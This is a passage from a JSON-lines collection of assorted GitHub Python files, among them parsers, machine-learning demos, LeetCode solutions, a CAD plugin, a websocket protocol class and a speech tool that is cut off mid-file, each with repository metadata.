key_value_delimiter.split(s, maxsplit=2)\n if len(split) != 2:\n raise ValueError(f\"expecting key-value pair, got {s}\")\n k, v = split\n if not key_first:\n k, v = v, k\n key = key_parser(k)\n value = get_value_parser(key)(v)\n return key, value\n\n return cls(pair_delimiter, combined_parser, output_type, **kwargs) # type: ignore[arg-type]\n\n\nclass NoFallback(Enum):\n no_fallback = auto()\n\n\nno_fallback = NoFallback.no_fallback\n\nCasesInput = Union[Iterable[Tuple[Needle, T]], Mapping[str, T], Type[Enum]]\nCasesInputIgnoreCase = Union[Iterable[Tuple[str, T]], Mapping[str, T], Type[Enum]]\n\n\nclass MatchParser(Generic[T]):\n @classmethod\n def _ensure_case_unique(cls, matches: Iterable[str]):\n seen_cases = set()\n for k in matches:\n key = k.lower()\n if key in seen_cases:\n raise ValueError(f\"duplicate case-invariant key {k}\")\n seen_cases.add(key)\n\n @classmethod\n def _cases(cls, x: CasesInput, ignore_case: bool) -> Iterable[Tuple[Pattern[str], T]]:\n if isinstance(x, Mapping):\n if ignore_case and __debug__:\n cls._ensure_case_unique(x.keys())\n return cls._cases(x.items(), ignore_case)\n if isinstance(x, type) and issubclass(x, Enum):\n return cls._cases(x.__members__, ignore_case)\n flags = _no_regex_flags\n if ignore_case:\n flags |= re.IGNORECASE\n return ((needle_to_pattern(n, flags), v) for n, v in x)\n\n def __init__(self, cases: CasesInput, fallback: Union[T, NoFallback] = no_fallback):\n cases_inp = self._cases(cases, ignore_case=False)\n if fallback is not no_fallback:\n cases_inp = chain(cases_inp, [(re.compile(\".*\"), fallback)])\n self.candidates = [(needle_to_pattern(n), v) for n, v in cases_inp]\n\n @classmethod\n def case_insensitive(\n cls, cases: CasesInputIgnoreCase, fallback: Union[T, NoFallback] = no_fallback\n ) -> MatchParser[T]:\n cases_inp = cls._cases(cases, ignore_case=True)\n return cls(cases_inp, fallback)\n\n def __call__(self, x: str) -> T:\n for pattern, value in self.candidates:\n if pattern.fullmatch(x):\n return value\n raise ValueError(f\"no match for {x}\")\n\n\nLookupCases = Union[Iterable[Tuple[str, T]], Mapping[str, T], Type[Enum]]\n\n\nclass LookupParser(Generic[T]):\n def __init__(\n self, lookup: LookupCases, fallback: Union[T, NoFallback] = no_fallback, *, _case_sensitive: bool = True\n ):\n cases: Iterable[Tuple[str, T]]\n if isinstance(lookup, Mapping):\n cases = lookup.items()\n elif isinstance(lookup, type) and issubclass(lookup, Enum):\n cases = lookup.__members__.items() # type: ignore[assignment]\n else:\n cases = lookup\n\n if _case_sensitive:\n self.lookup = dict(cases)\n else:\n self.lookup = {k.lower(): v for k, v in cases}\n self.fallback = fallback\n self.case_sensitive = _case_sensitive\n\n @classmethod\n def case_insensitive(cls, lookup: Mapping[str, T], fallback: Union[T, NoFallback] = no_fallback) -> LookupParser[T]:\n return cls(lookup, fallback, _case_sensitive=False)\n\n def __call__(self, x: str) -> T:\n if not self.case_sensitive:\n key = x.lower()\n else:\n key = x\n try:\n return self.lookup[key]\n except KeyError as e:\n if self.fallback is no_fallback:\n raise ValueError(f\"no match for {x}\") from e\n return self.fallback\n\n\nparser_special_superclasses[Enum] = LookupParser.case_insensitive # type: ignore[assignment]\n","repo_name":"bentheiii/envolved","sub_path":"envolved/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":12226,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"26529238589","text":"import numpy as np\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import accuracy_score,recall_score,precision_score,f1_score\n\nif __name__=='__main__':\n pddata_train=pd.read_csv('.....',header=None)\n pddata_test=pd.read_csv('......',header=None)\n x_train=pddata_train.loc[:,pddata_train.columns!=64]\n y_train=pddata_train.loc[:,pddata_train.columns==64]\n\n x_train=np.array(x_train)\n images_train=x_train.reshape([-1,8,8])\n\n x_test= pddata_test.loc[:, pddata_train.columns != 64]\n y_test = pddata_test.loc[:, pddata_train.columns == 64]\n\n x_test = np.array(x_test)\n images_test = x_test.reshape([-1, 8, 8])\n plt.figure(figsize=(100,50))\n for index,image in enumerate(images_train[:16]):\n plt.subplot(4,8,index+1)\n plt.imshow(image,cmap=plt.cm.gray_r,interpolation='nearest')\n plt.title('the ture number is %d'%(y_train.loc[index]))\n for index,image in enumerate(images_test[:16]):\n plt.subplot(4,8,index+17)\n plt.imshow(image,cmap=plt.cm.gray_r,interpolation='nearest')\n plt.title('the true number is %d'%(y_test.loc[index]))\n plt.show()\n\n clf=SVC(C=1,kernel='rbf',gamma=0.001)\n clf.fit(x_train,y_train.values.ravel())\n y_hat=clf.predict(x_test)\n accuracy=accuracy_score(y_test,y_hat)\n print('the accuracy is %f'%(accuracy) )\n plt.figure(figsize=(100,50))\n y_hat_err=y_hat[y_hat!=y_test.values.ravel()]\n y_test_err=y_test[y_hat!=y_test.values.ravel()].values.ravel()\n err_images=images_test[y_hat!=y_test.values.ravel()]\n\n for index,err_image in enumerate(err_images):\n\n plt.subplot(4,8,index+1)\n plt.imshow(err_image,cmap=plt.cm.gray_r,interpolation='nearest')\n plt.title('y_hat=%d, y=%d'%(y_hat_err[index],y_test_err[index]))\n\n plt.show()\n\n\n\n\n\n\n\n\n\n","repo_name":"duanluyun/HandWritten_Digit_Recoganition","sub_path":"Support Vecotor Machine/HandWritenDigitalRecoganize.py","file_name":"HandWritenDigitalRecoganize.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"40114101831","text":"meta = 10000\nvendas = [\n ['João', 15000],\n ['Julia', 27000],\n ['Marcus', 9900],\n ['Maria', 3750],\n ['Ana', 10300],\n ['Alon', 7870],\n]\nmeta_batida = []\n\nfor venda in vendas:\n if venda[1] >= meta:\n meta_batida.append(venda)\n\n# print(meta_batida)\nprint(\"{:.0%} dos vendedores bateram a meta\".format(len(meta_batida)/len(vendas)))\n\n# ------------------\n# cálculo diretamente na lista\nqtde_vendedores_acima = 0\n\nfor venda in vendas:\n if venda[1] >= meta:\n qtde_vendedores_acima += 1\n\nprint('{:.0%} dos vendedores bateram a meta'.format(qtde_vendedores_acima / len(vendas)))","repo_name":"Rayron2012/HSTG_Treinamentos","sub_path":"Exercicios/Exercicios de For 2.py","file_name":"Exercicios de For 2.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73950422886","text":"import time\n\nimport belissiconsole as bc\n\n\ndef main():\n # a = bc.rainbow(\"🌈 THIS SHOULD BE A RAINBOW 🌈\")\n # time.sleep(5)\n # a.stop()\n\n bc.rainbow_print(\"WOW SO PRETTY ✨\")\n bc.rainbow_print(\"WOW SO PRETTY 🚀\")\n bc.rainbow_print(\"WOW SO PRETTY 🌈\")\n bc.rainbow_print(\"WOW SO PRETTY 🌟\")\n\n a = bc.rainbow(\"🌈 THIS SHOULD BE A RAINBOW 🌈\")\n time.sleep(3)\n a.stop()\n\n a = bc.rainbow(\"🌈 This tests 🌈\\n🌈 multiple lines 🌈\")\n time.sleep(3)\n a.stop()\n\n a = bc.rainbow(\"\\n\".join(\"a lot of lines, this might lag\" for _ in range(20)))\n time.sleep(5)\n a.stop()\n\n a = bc.rainbow(\"this should flash very fast\", speed=10)\n time.sleep(5)\n a.stop()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Belissimo-T/belissiconsole","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39156760330","text":"import numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport data_reader\nfrom model import LeNet\nimport os\nfrom scipy import ndimage\nfrom skimage.transform import resize\nfrom skimage.data import imread\nfrom skimage import color\n\ntraining_file = 'data/train.p'\nvalidation_file = 'data/valid.p'\ntesting_file = 'data/test.p'\n\nis_debug = True\n\ndata = data_reader.data(training_file, validation_file, testing_file)\ndata.print_data_info()\n\n# according to the info we know that there is 43 classes of sign\n\n# use a dictionary to manage the key-label\nlabel_dict = {}\nwith open('signnames.csv', 'r') as f:\n lines = f.readlines()\n for line in lines[1:]:\n tmp = line.strip('\\n')\n tmp = tmp.split(',')\n label_dict[tmp[0]] = tmp[1]\n f.close()\n\n\ndef subplot_show(img_list, label_list, gray=False):\n \"\"\"\n show 16 pictures\n the img_list must be a list with 16 images\n \"\"\"\n for i in range(len(img_list)):\n plt.subplot(4, 4, i + 1)\n plt.title(label_dict[str(int(label_list[i]))])\n if gray is True:\n plt.imshow(img_list[i], cmap='gray')\n else:\n plt.imshow(img_list[i])\n plt.show()\n\n# # the original images\n# subplot_show(data.test_x[:4])\n\n# image after normalization and convert to gray scale\nif is_debug:\n subplot_show(data.test_x[:16], data.test_y[:16], gray=True)\n\nmodel = LeNet(data)\n\n# the training stage\nnum_epoch = 20\nbatch_size = 128\nsave_dir = 'model_save_dir'\nnum_step = int(np.round(data.n_train/batch_size))\nis_training = False\n\nif not os.path.exists(save_dir):\n os.mkdir(save_dir)\nsave_path = os.path.join(save_dir, 'convnet_model.ckpt')\n\n\ndef outputFeatureMap(image_input, sess, tf_activation, activation_min=-1, activation_max=-1 ,plt_num=1):\n # Here make sure to preprocess your image_input in a way your network expects\n # with size, normalization, ect if needed\n # image_input =\n # Note: x should be the same name as your network's tensorflow data placeholder variable\n # If you get an error tf_activation is not defined it may be having trouble accessing the variable from inside a function\n image_input = np.reshape(image_input, [1, 32, 32])\n activation = tf_activation.eval(session=sess, feed_dict={model.x_placeholder:image_input})\n featuremaps = activation.shape[3]\n plt.figure(plt_num, figsize=(15, 15))\n for featuremap in range(featuremaps):\n plt.subplot(6,8, featuremap+1) # sets the number of feature maps to show on each row and column\n plt.title('FeatureMap ' + str(featuremap)) # displays the feature map number\n if activation_min != -1 & activation_max != -1:\n plt.imshow(activation[0,:,:, featuremap], interpolation=\"nearest\", vmin =activation_min, vmax=activation_max, cmap=\"gray\")\n elif activation_max != -1:\n plt.imshow(activation[0,:,:, featuremap], interpolation=\"nearest\", vmax=activation_max, cmap=\"gray\")\n elif activation_min !=-1:\n plt.imshow(activation[0,:,:, featuremap], interpolation=\"nearest\", vmin=activation_min, cmap=\"gray\")\n else:\n plt.imshow(activation[0,:,:, featuremap], interpolation=\"nearest\", cmap=\"gray\")\n\n\nwith tf.Session(graph=model.graph) as sess:\n sess.run(tf.global_variables_initializer())\n\n if is_training:\n for epoch in range(num_epoch):\n for step in range(num_step):\n batch_x, batch_y = data.next_batch(batch_size)\n\n # define a feed dict to input minibatch\n feed_dict = {model.x_placeholder: batch_x, model.y_placeholder: batch_y, model.keep_p:0.5}\n\n sess.run(model.train_op, feed_dict=feed_dict)\n\n # eval stage\n val_loss, val_acc, merge, g_step = sess.run([model.loss, model.accuracy, model.merge, model.global_step],\n feed_dict={model.x_placeholder:data.val_x,\n model.y_placeholder:data.val_y,\n model.keep_p:1.0})\n # add some training info to summary file\n model.summary_writer.add_summary(merge, global_step=epoch)\n\n print('validation loss at eopch %d: %f' % (epoch, val_loss))\n print('validation accuracy at eopch %d: %f' % (epoch, val_acc))\n\n model.saver.save(sess, save_path, global_step=epoch)\n\n # test stage\n print('Test accuracy:', model.accuracy.eval(\n feed_dict={model.x_placeholder: data.test_x, model.y_placeholder: data.test_y, model.keep_p:1.0}), '%')\n\n else:\n # load the pre-trained model and classify the images from web\n model.saver.restore(sess, save_path + '-19')\n # read the images and labels\n path_list = os.listdir('web_imgs')\n imgs_list = []\n imgs_arr = np.zeros([6, 32, 32])\n label_arr = np.zeros([6])\n for item in path_list:\n imgs_list.append(imread(os.path.join('web_imgs', item)))\n for i, item in enumerate(imgs_list):\n item = (item - 128.) / 128.\n item = color.rgb2gray(item)\n imgs_arr[i, :, :] = resize(item, (32, 32))\n for i, item in enumerate(path_list):\n item = item.split('.')[0]\n item = int(item)\n label_arr[i] = item\n # run the pre-trained model to predict\n output, acc, loss, top_k = sess.run([model.output, model.accuracy, model.loss, model.top_k], feed_dict={model.x_placeholder:imgs_arr,\n model.y_placeholder:label_arr,\n model.keep_p:1.0})\n\n print(top_k)\n\n print('the predict accuracy of web images is:', str(acc))\n predict = np.argmax(output, 1)\n for i in range(len(imgs_arr)):\n plt.subplot(2, 3, i + 1)\n plt.title('predict:'+label_dict[str(int(predict[i]))]+'\\n truth:'+label_dict[str(int(label_arr[i]))])\n plt.imshow(imgs_arr[i, :, :], cmap='gray')\n plt.show()\n\n\n\n\n\n\n\n","repo_name":"lixiyun98/self-driving-computer-vision","sub_path":"traffic_signs_classifier.py","file_name":"traffic_signs_classifier.py","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"16408291131","text":"from sqlalchemy import create_engine,Column,Integer,String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n#创建连接数据库的引擎\nengine = create_engine(\n 'mysql+pymysql://root:tedu.cn@127.0.0.1/tedu2006?charset=utf8',\n encoding = 'utf8',\n echo = True\n)\n\nBase = declarative_base()\nSession = sessionmaker(bind=engine)\n\nclass Department(Base):\n __tablename__ = 'departments'\n id = Column(Integer,primary_key=True)\n dep_name = Column(String(20),unique=True)\n\nif __name__ == '__main__':\n Base.metadata.create_all(engine)","repo_name":"pgj-ctrl/pgj-Repository","sub_path":"py02/day4/dbconn1.py","file_name":"dbconn1.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6705251218","text":"'''\nGiven four integer arrays nums1, nums2, nums3, and nums4 all of length n, return the number \nof tuples (i, j, k, l) such that:\n\n0 <= i, j, k, l < n\nnums1[i] + nums2[j] + nums3[k] + nums4[l] == 0\n'''\n\n\nclass Solution:\n def fourSumCount(self, nums1: list[int], nums2: list[int], nums3: list[int], nums4: list[int]) -> int:\n hashmap = dict()\n for n1 in nums1:\n for n2 in nums2:\n hashmap[n1+n2] = hashmap.get(n1+n2, 0) + 1\n count = 0\n for n3 in nums3:\n for n4 in nums4:\n k = 0-(n3+n4)\n if k in hashmap:\n count += hashmap[k]\n return count","repo_name":"Yutong1996/CS5800-Algorithm-Homework","sub_path":"leetcode/4sum_2.py","file_name":"4sum_2.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12852947627","text":"#This function takes two points as input and returns the distance between them\ndef distanceCalculator(point1,point2):\n return ((point1[0]-point2[0])**2+(point1[1]-point2[1])**2)**0.5\n\n#This function takes a cluster of points as an input and calculates and returns their mean\ndef mean(cluster):\n x = sum([i[0] for i in cluster])/len(cluster)\n y = sum([i[1] for i in cluster])/len(cluster)\n return (x,y)\n\ndataSet = [(0,0),(1,0),(1,1),(0,1),(-1,0)]\ncentroid1 = (1,0)\ncentroid2 = (1,1)\n\n#This loop will run for 2 times to check if we are getting the same clusters and centroids in second\n#iteration as we got in first iteration.\nfor i in range(0,2):\n print(\"\\nIteration number {}\\n\".format(i+1))\n cluster1 = []\n cluster2 = []\n #This loop will run for every points in the dataset and compare the distance between each point and \n #centroid of each clusters, and will save the point in the cluster which in nearest to this point.\n for j in range(0,len(dataSet)):\n if distanceCalculator(dataSet[j],centroid1)<=distanceCalculator(dataSet[j],centroid2):\n cluster1.append(dataSet[j])\n else:\n cluster2.append(dataSet[j])\n centroid1 = mean(cluster1)\n centroid2 = mean(cluster2)\n print(\"Cluster 1 : \",cluster1)\n print(\"Cluster 2 : \",cluster2)\n print(\"Centroid 1 : \",centroid1)\n print(\"Centroid 2 : \",centroid2)","repo_name":"usmanshouk/Python-Projects","sub_path":"Clustering Algorithm/clusteringAlgorithm.py","file_name":"clusteringAlgorithm.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"16978175615","text":"import os\n\nclass Validator():\n\t\"\"\"\n\tValidates the cmd args and data\n\t\"\"\"\n\tPATH = 'raw_data/'\n\n\tdef __init__(self, player1, player2):\n\t\tself.player1 = player1\n\t\tself.player2 = player2\n\t\tpass\n\n\n\tdef isValidEntries(self):\n\t\t\"\"\"\n\t\tchecks the raw_data/ dir to see if both players' data files are present\n\t\t\"\"\"\n\t\tfile_names = os.listdir(Validator.PATH)\n\t\tnames = [name.lower()[:-4] for name in file_names]\n\t\t\n\t\tnot_founds = []\n\t\tif self.player1.lower() not in names:\n\t\t\tnot_founds.append(self.player1)\t\n\t\t\n\t\tif self.player2.lower() not in names:\n\t\t\tnot_founds.append(self.player2)\n\n\t\tif len(not_founds) == 0:\n\t\t\treturn True\n\t\telse:\n\t\t\tfor player in not_founds:\n\t\t\t\tprint(player + '''s data file is not found in 'raw_data/' directory. \n\t\t\t\t\tDouble check that it's there, and that it was entered correctly.''')\n\t\t\treturn False\n\n\tdef constructRawData(self):\n\t\t\"\"\"\n\t\tcan only be run after isValidEntries() is True\n\t\t\"\"\"\n\t\tself.player1_raw_data = []\n\t\tself.player2_raw_data = []\n\t\tPLAYER1_PATH = Validator.PATH + self.player1 + '.txt'\n\t\tPLAYER2_PATH = Validator.PATH + self.player2 + '.txt'\n\n\t\twith open(PLAYER1_PATH, 'r') as f:\n\t\t\tfor line in f.readlines():\n\t\t\t\tself.player1_raw_data.append(line.strip())\n\n\t\twith open(PLAYER2_PATH, 'r') as f:\n\t\t\tfor line in f.readlines():\n\t\t\t\tself.player2_raw_data.append(line.strip())\n\n\tdef isValidData(self):\n\t\t\"\"\"method ensures that both users' draw data is valid\n\t\ttest by look at the first five charaters of each entry\"\"\"\n\t\t### player 1\n\t\tfor line in self.player1_raw_data:\n\t\t\tif not line[0:5] == 'surf_':\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\tpass\n\n\t\t### player 2\n\t\tfor entry in self.player2_raw_data:\n\t\t\tif not line[0:5] == 'surf_':\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\tpass\n\n\t\t### if all passes\n\t\treturn True\n\n\tdef isSyncedData(self):\n\t\t\"\"\"method tests that the entry data for both users is in sync with one-another\"\"\"\n\t\tplayer1s_map_completes = []\n\t\tplayer2s_map_completes = []\n\t\tshared_entries = []\n\n\t\tfor entry in self.player1_raw_data:\n\t\t\tif entry.split(' ')[0] in [entry.split(' ')[0] for entry in self.player2_raw_data]:\n\t\t\t\tshared_entries.append(entry.split(' ')[0])\n\n\n\t\tfor entry in self.player1_raw_data:\n\t\t\tmap_ = entry.split(' ')[0]\n\t\t\tif map_ in shared_entries:\n\t\t\t\tdenominator = entry.split('/')[-1]\n\t\t\t\tplayer1s_map_completes.append(denominator)\n\n\n\t\tfor entry in self.player2_raw_data:\n\t\t\tmap_ = entry.split(' ')[0]\n\t\t\tif map_ in shared_entries:\n\t\t\t\tdenominator = entry.split('/')[-1]\n\t\t\t\tplayer2s_map_completes.append(denominator)\n\n\n\t\tif sorted(player1s_map_completes) == sorted(player2s_map_completes):\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\n\n\t# def __str__(self):\n\t# \t\"\"\" \"\"\"\n\t# \ts1 = self.isValidEntries()\n\t# \ts2 = self.isValidData()\n\t# \ts3 = self.isSyncedData()\n\n\t# \treturn \"\"\"\n\t# isValidEntries() --> %r\n\t# isValidData() --> %r\n\t# isSyncedDat() --> %r\n\t# \t\"\"\" % (s1, s2, s3)\n\n","repo_name":"al1Null/surf-compare","sub_path":"Validator.py","file_name":"Validator.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72631104484","text":"\n\ntc = [None, False, False, False, True, True]\n\nclass SVNRepo:\n @classmethod\n def isBadVersion(cls, id):\n return tc[id]\n\ndef fbv(v):\n l, r = 1, v\n while r > l:\n m = l + (r - l) // 2\n if SVNRepo.isBadVersion(m):\n r = m\n else:\n l = m + 1\n return l\n\nif __name__ == '__main__':\n print(fbv(5))\n","repo_name":"clarencenhuang/programming-challenges","sub_path":"lintcode/first_bad_version.py","file_name":"first_bad_version.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71574849125","text":"import os\nimport sys\ncad_dir = os.path.dirname(os.path.realpath(__file__))\npycad_dir = os.path.realpath(cad_dir + '/../PyCAD')\nsys.path.append(pycad_dir)\nimport wx\nimport cad\nimport geom\n\nfrom SolidApp import SolidApp # from CAD\nfrom InputMode import InputMode\nfrom Ribbon import RB\nfrom Ribbon import Ribbon\nfrom Ribbon import GrayedButton\n\nfrom points import Points\nfrom points import type as points_type\n\n\nclass PointEditing(InputMode):\n def __init__(self, front):\n InputMode.__init__(self)\n # front is True or False ( for rear )\n self.front = front\n self.points = None\n \n def GetTitle(self):\n return 'Point Editing ' + ('Front' if self.front else 'Rear')\n \n def GetHelpText(self):\n return 'Drag on ' + ('Blue' if self.front else 'Red' ) + ' curve to modify it'\n \n def OnMouse(self, event):\n if event.Moving():\n if event.leftDown:\n v = wx.GetApp().GetViewport()\n p = cad.Digitize(cad.IPoint(event.x, event.y))\n self.points.ModifyAtPoint(p.point, self.front)\n\n v.need_update = True\n v.need_refresh = True\n wx.GetApp().frame.graphics_canvas.Refresh() \n \n if event.GetWheelRotation() != 0:\n wx.GetApp().GetViewport().OnWheelRotation(event.wheelRotation, event.x, event.y)\n\nfront_editing = PointEditing(True)\nrear_editing = PointEditing(False)\n \nclass CadApp(SolidApp):\n def __init__(self):\n self.cad_dir = cad_dir\n SolidApp.__init__(self)\n \n def GetAppTitle(self):\n return 'ParaGame Point List Editing Software'\n \n def GetAppConfigName(self):\n return 'ParaGameCAD'\n \n def RegisterObjectTypes(self):\n SolidApp.RegisterObjectTypes(self)\n self.RegisterImportFileTypes(['points'], 'Points Files', ImportPointsFile)\n self.RegisterExportFileTypes(['points'], 'Points Files', ExportPointsFile)\n\n def AddExtraRibbonPages(self, ribbon):\n SolidApp.AddExtraRibbonPages(self, ribbon)\n \n save_bitmap_path = self.bitmap_path\n self.bitmap_path = cad_dir\n\n panel = RB.RibbonPanel(ribbon.main_page, wx.ID_ANY, 'Point', ribbon.Image('points'))\n toolbar = RB.RibbonButtonBar(panel)\n Ribbon.AddToolBarTool(toolbar,'Front', 'front', 'Edit Front Points', self.OnFrontEditButton)\n Ribbon.AddToolBarTool(toolbar,'Rear', 'rear', 'Edit Rear Points', self.OnRearEditButton)\n Ribbon.AddToolBarTool(toolbar,'Game', 'game', 'Run Game', self.OnGameButton)\n \n ribbon.main_page.Realize()\n\n self.bitmap_path = save_bitmap_path\n \n def OnEdit(self, front):\n editing = front_editing if front else rear_editing\n editing.points = None\n doc = cad.GetApp()\n object = doc.GetFirstChild()\n while object:\n if object.GetType() == points_type:\n editing.points = object\n break\n self.SetInputMode(editing)\n \n def OnFrontEditButton(self, event):\n self.OnEdit(True)\n \n def OnRearEditButton(self, event):\n self.OnEdit(False)\n \n def OnGameButton(self, event):\n ExportPointFilePath('line_lengths.points')\n os.system('\"C:\\\\Users\\\\Dan Heeks\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python36-32\\\\python\" game.py /i')\n\ndef ImportPointsFile():\n points = Points()\n points.points = eval( open(cad.GetFilePathForImportExport(), \"r\").read() )\n cad.AddUndoably(points)\n \ndef ExportPointFilePath(path):\n f = open(path, 'w')\n\n doc = cad.GetApp()\n object = doc.GetFirstChild()\n while object:\n if object.GetType() == points_type:\n f.write(str(object.points) + '\\n')\n object = doc.GetNextChild()\n f.close()\n\ndef ExportPointsFile():\n ExportPointFilePath(cad.GetFilePathForImportExport())\n","repo_name":"danheeks/ParaGame","sub_path":"CadApp.py","file_name":"CadApp.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"40495167052","text":"#STEP 1\ncollegeAddress = {\n'Building Name': 'Ammons Hall',\n'Street': '711 Oval Dr',\n'City': 'Fort Collins',\n'State': 'Colorado',\n'Zip Code': 80523\n}\n\n#STEP 2\nbuilding2Address = {'Building Name': 'Ammons Hall',\n'Street': '711 Oval Dr',\n'City': 'Fort Collins',\n'State': 'Colorado',\n'Zip Code': 80523}\n\nbuilding3Address = {'Building Name': 'Ammons Hall',\n'Street': '711 Oval Dr',\n'City': 'Fort Collins',\n'State': 'Colorado',\n'Zip Code': 80528}\n\ndictionaryOfAddresses = {\n'College Address': collegeAddress,\n'Building 2 Address': building2Address,\n'Building 3 Address': building3Address}\n\n\n# for you to test your dictionary of dictionaries\nprint(dictionaryOfAddresses)\n\n# should output Fort Collins, feel free to change for testing purposes\nprint(dictionaryOfAddresses['College Address']['City'])","repo_name":"JakeAum/CS152-Coursework","sub_path":"dicitonaries.py","file_name":"dicitonaries.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17337360728","text":"import asyncio\nimport logging\n\nimport websockets\nfrom websockets.exceptions import ConnectionClosed\nfrom websockets.framing import OP_CLOSE, OP_TEXT, encode_data, parse_close\nfrom websockets.protocol import State\n\nlogger = logging.getLogger(__name__)\n\n\nclass SCSocketServerProtocol(websockets.WebSocketServerProtocol):\n ping_key = \"ping\"\n\n async def ping(self, data=None):\n await self.ensure_open()\n if data is None:\n data = \"#1\"\n if data is not None:\n data = encode_data(data)\n\n # Protect against duplicates if a payload is explicitly set.\n if self.ping_key in self.pings:\n raise ValueError(\"already waiting for a pong with the same data\")\n self.pings[self.ping_key] = self.loop.create_future()\n\n await self.write_frame(True, OP_TEXT, data)\n\n return asyncio.shield(self.pings[self.ping_key])\n\n async def pong(self, data=None):\n await self.ensure_open()\n if data is None:\n data = \"#2\"\n if data is not None:\n data = encode_data(data)\n await self.write_frame(True, OP_TEXT, data)\n\n async def read_data_frame(self, max_size):\n \"\"\"\n Read a single data frame from the connection.\n Process control frames received before the next data frame.\n Return ``None`` if a close frame is encountered before any data frame.\n \"\"\"\n # 6.2. Receiving Data\n while True:\n frame = await self.read_frame(max_size)\n\n # 5.5. Control Frames\n if frame.opcode == OP_CLOSE:\n # 7.1.5. The WebSocket Connection Close Code\n # 7.1.6. The WebSocket Connection Close Reason\n self.close_code, self.close_reason = parse_close(frame.data)\n try:\n # Echo the original data instead of re-serializing it with\n # serialize_close() because that fails when the close frame\n # is empty and parse_close() synthetizes a 1005 close code.\n await self.write_close_frame(frame.data)\n except ConnectionClosed:\n # It doesn't really matter if the connection was closed\n # before we could send back a close frame.\n pass\n return None\n\n elif frame.opcode == OP_TEXT:\n # PING\n if frame.data == b\"#1\":\n # Answer pings.\n logger.debug(\n \"%s: %s - received ping, sending pong: %s\",\n self.remote_address,\n self.side,\n frame.data or \"[empty]\",\n )\n await self.pong()\n continue\n # PONG\n elif frame.data == b\"#2\":\n # Acknowledge pings on solicited pongs.\n if self.ping_key in self.pings:\n logger.debug(\n \"%s: %s - received solicited pong: %s\",\n self.remote_address,\n self.side,\n frame.data or \"[empty]\",\n )\n # Acknowledge all pings up to the one matching this pong.\n ping = self.pings[self.ping_key]\n if not ping.done():\n ping.set_result(None)\n del self.pings[self.ping_key]\n else:\n logger.debug(\n \"%s - received unsolicited pong: %s\",\n self.side,\n frame.data or \"[empty]\",\n )\n continue\n\n return frame\n\n def abort_pings(self):\n \"\"\"\n Raise ConnectionClosed in pending keepalive pings.\n They'll never receive a pong once the connection is closed.\n \"\"\"\n assert self.state is State.CLOSED\n exc = self.connection_closed_exc()\n\n for ping in self.pings.values():\n ping.set_exception(exc)\n # If the exception is never retrieved, it will be logged when ping\n # is garbage-collected. This is confusing for users.\n # Given that ping is done (with an exception), canceling it does\n # nothing, but it prevents logging the exception.\n ping.cancel()\n\n if self.pings:\n pings_hex = \", \".join(ping_id or \"[empty]\" for ping_id in self.pings)\n logger.debug(\"server - aborted pending ping: %s\", pings_hex)\n","repo_name":"tsifrer/ark","sub_path":"chain/p2p/socket_protocol.py","file_name":"socket_protocol.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"31352150435","text":"import speech\nimport pyperclip\nfrom Sound import play\nimport Text\nfrom pathlib import Path\nfrom conf import *\nimport cache\n\nPROGRESS_REPORT = Text.template(\"\\nSegment {}:\\n------\\n{}\")\nCACHE_REPORT = Text.template(\"Playing text.\\nText:\\n{}\")\nSHORT_REPORT = Text.template(\"Text:\\n{}\")\n\ndef speak(text):\n\t\"\"\"Synthesize and play a speech\n\n\tArgs:\n\t\ttext (str): Text to synthesize\n\t\tsilent: don't play speech\n\t\tlazy: play speech after getting all segments\n\n\tReturns:\n\t\tbyte: A byte stream\n\t\"\"\"\n\n\t# Preprocess text\n\ttext = Text.clean(text)\n\n\t# Play cached speech if possible\n\tcached_speech = cache.retrieve(text)\n\tif cached_speech:\n\t\tCACHE_REPORT((text,))\n\t\tplay(cached_speech[1])\n\t\treturn\n\n\tprint(\"Synthesizing speech\")\n\tsegments = Text.paginate(text, conf.page_limit)\n\n\t# If speech is short, flush it to disk before play\n\t# (speed up retries for interrupted speeches)\n\tif len(segments) == 1:\n\t\ttext = segments[0][1]\n\t\tSHORT_REPORT((text,))\n\t\tbuffer = speech.synth(text)\n\t\tmp3 = cache.store(text, buffer)\n\t\tplay(mp3)\n\t\treturn\n\n\tbuffers = 